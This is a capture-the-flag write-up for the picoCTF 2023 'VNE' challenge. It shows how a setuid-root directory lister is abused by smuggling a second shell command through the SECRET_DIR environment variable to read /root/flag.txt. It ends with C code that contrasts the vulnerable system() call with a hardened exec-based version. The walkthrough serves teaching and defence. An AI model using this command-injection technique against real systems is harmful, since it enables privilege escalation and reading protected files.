Points: 200
Tags: picoCTF 2023, Binary Exploitation, bash, env, injection
Author: JUNIAS BONOU
Description:
We've got a binary that can list directories as root, try it out !!
ssh to saturn.picoctf.net:61680, and run the binary named "bin" once connected.
Login as ctf-player with the password, d8819d45
Hints:
1. Have you checked the content of the /root folder
2. Find a way to add more instructions to the ls
Challenge link: https://play.picoctf.org/practice/challenge/387
We start by connecting to the server
┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2023/Binary_Exploitation/VNE]
└─$ ssh -p 61680 ctf-player@saturn.picoctf.net
The authenticity of host '[saturn.picoctf.net]:61680 ([13.59.203.175]:61680)' can't be established.
ED25519 key fingerprint is SHA256:HPhB80jvwzwsykN/XSDUt9zGDYpkIHHd9PMoDlkzWpw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[saturn.picoctf.net]:61680' (ED25519) to the list of known hosts.
ctf-player@saturn.picoctf.net's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.19.0-1024-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
ctf-player@pico-chall$
Then we look for the bin binary mentioned in the challenge description:
ctf-player@pico-chall$ ls -la
total 24
drwxr-xr-x 1 ctf-player ctf-player 20 Nov 5 08:46 .
drwxr-xr-x 1 root root 24 Aug 4 22:04 ..
drwx------ 2 ctf-player ctf-player 34 Nov 5 08:46 .cache
-rw-r--r-- 1 root root 67 Aug 4 22:05 .profile
-rwsr-xr-x 1 root root 18752 Aug 4 22:05 bin
ctf-player@pico-chall$ ./bin
Error: SECRET_DIR environment variable is not set
ctf-player@pico-chall$
Note that the bin binary has the setuid bit set and is owned by root!
Ok, let's set the SECRET_DIR environment variable to /root as suggested in the hints.
ctf-player@pico-chall$ SECRET_DIR=/root
ctf-player@pico-chall$ ./bin
Error: SECRET_DIR environment variable is not set
ctf-player@pico-chall$ export SECRET_DIR
ctf-player@pico-chall$ ./bin
Listing the content of /root as root:
flag.txt
We can list any directory of our choice as root.
The program probably does something like ls $SECRET_DIR, with the variable expanded unquoted by a shell.
Let's try to verify this by passing an ls option instead of a directory:
ctf-player@pico-chall$ SECRET_DIR="-l /root/flag.txt"
ctf-player@pico-chall$ ./bin
Listing the content of -l /root/flag.txt as root:
-rw------- 1 root root 41 Aug 4 22:05 /root/flag.txt
Great, the value is passed through unchanged, so we can inject additional commands into the variable to get the flag, as suggested in the hints.
Finally, we append a cat command to read the flag and an echo command so the output ends with a newline and is easier to read:
ctf-player@pico-chall$ SECRET_DIR="-l /root/flag.txt; cat /root/flag.txt; echo"
ctf-player@pico-chall$ ./bin
Listing the content of -l /root/flag.txt; cat /root/flag.txt; echo as root:
-rw------- 1 root root 41 Aug 4 22:05 /root/flag.txt
picoCTF{<REDACTED>}
ctf-player@pico-chall$
And there we have the flag.
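As an added example (not the challenge's source, which is not published here), the assumed bug is reconstructed in C next to a hardened version: the guess is that bin builds the string "ls $SECRET_DIR" and hands it to system(). The hypothetical is_acceptable_dir() and list_dir_hardened() instead validate the value as an existing absolute directory and exec /bin/ls directly with "--", so the value can never be parsed as options or as a second command.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Assumed reconstruction of the bug: the untrusted SECRET_DIR value is spliced
 * into a shell command line, so ';' and everything after it also run as root. */
int list_dir_vulnerable(const char *secret_dir) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "ls %s", secret_dir);
    return system(cmd);   /* runs /bin/sh -c "ls <attacker-controlled text>" */
}

/* Policy for the hardened version: only an absolute path that exists and is a
 * directory. Whitespace and shell metacharacters are rejected as well, even
 * though execv never involves a shell (defence in depth, simpler to audit). */
int is_acceptable_dir(const char *dir) {
    struct stat st;
    if (dir == NULL || dir[0] != '/')
        return 0;
    if (strpbrk(dir, " \t\n;|&`$<>()") != NULL)
        return 0;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    return 1;
}

/* Hardened listing: no shell. ls receives the path as a single argv element
 * after "--", so "-l /root/flag.txt; cat ..." could only ever be a file name.
 * Returns ls's exit status, or -1 if the path was rejected or exec failed. */
int list_dir_hardened(const char *secret_dir) {
    if (!is_acceptable_dir(secret_dir))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = {"ls", "--", (char *)secret_dir, NULL};
        execv("/bin/ls", argv);
        _exit(127);           /* only reached if execv itself fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

The injected value from the writeup is rejected before any process is spawned, while a plain "/" still lists normally.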
For additional information, please see the references below.